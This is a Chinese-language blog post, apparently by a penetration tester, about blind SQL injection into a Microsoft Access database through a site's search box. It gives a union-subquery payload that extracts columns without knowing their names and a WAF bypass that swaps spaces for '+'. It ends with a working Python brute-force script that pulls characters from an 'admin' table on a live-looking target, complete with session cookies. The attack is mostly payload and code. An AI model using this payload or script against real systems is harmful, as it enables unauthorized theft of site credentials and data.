迟来的新年快乐 好久没写东西 也没干货可写 太菜了
由于平时碰到的access的注入点比较少 也没认真学习过access注入 印象中除了偏移注入 其他都是需要爆破表名和字段名 看到个payload不需要字段名 遂研究下
Payload:asdf' or asc(mid((select a from(select 1,2,3 as a,4,5,6 from admin where 1=2 union select top 1 * from admin)ss),{},1))={} or 'a'='a
注入点位置在搜索框
有WTS waf
空格换成+就绕过去了
直接看payload
Payload通过闭合 用or实现条件为假 可控 假
直接看子查询select+1,2,3+as+a,4,5,6+from+admin+where+1=2+union+select+top+1+*+from+admin
本地尝试复现
select 1,2,3 as a from admin where 1=2 union select top 1 * from admin
执行后第3行的字段会以字段名为a返回 由于where 1=2为假 所以前面的没有返回 返回的是 select top 1 * from admin的结果
这样就好理解了
select a from (select 1,2 ,3 as a from admin where 1=2 union select top 1 * from admin)
就等价于select a from 刚刚的结果集
接着就是通过mid和asc进行盲注了
通过编写脚本一下就跑出来了如需跑其他字段将as a放入别的字段位置就行了
脚本
#coding=utf-8
import hackhttp
url = "https://xxx/webasp/ly.asp"
proxy = {'http':'https://127.0.0.1:8080'}
user = ''
hh=hackhttp.hackhttp()
for i in range(1,33):
for j in range(43,126):
raw_data = '''POST /webasp/ly.asp HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://xxx.com
Connection: close
Referer: https://xxx.com/webasp/ly.asp
Cookie: bdshare_firstime=1613967788392; Hm_lvt_31533bb09acca10f4010ef9ed32e309e=1613967789,1614151209; config=; ASPSESSIONIDSCDCDDBQ=KOOFBPPCOPOMAJMGAONKHPJO; Hm_lpvt_31533bb09acca10f4010ef9ed32e309e=1614151993; ASPSESSIONIDQAADBDCR=FFDJJAADBHINHDLIIAKCDJBH
Upgrade-Insecure-Requests: 1
keywords=asdf'+or+asc(mid((select+a+from+(select+1,2,3+as+a,4,5,6+from+admin+where+1=2+union+select+top+1+*+from+admin)ss),{},1))={}+or+'a'='a
'''.format(i, j)
code, head, html, redirect_url, log = hh.http(url=url,raw=raw_data,proxy=('127.0.0.1', 8080))
if '2015' in html:
user+=chr(j)
print(user)
Break
使用request库payload会被url编码 所以选择了hackhttp库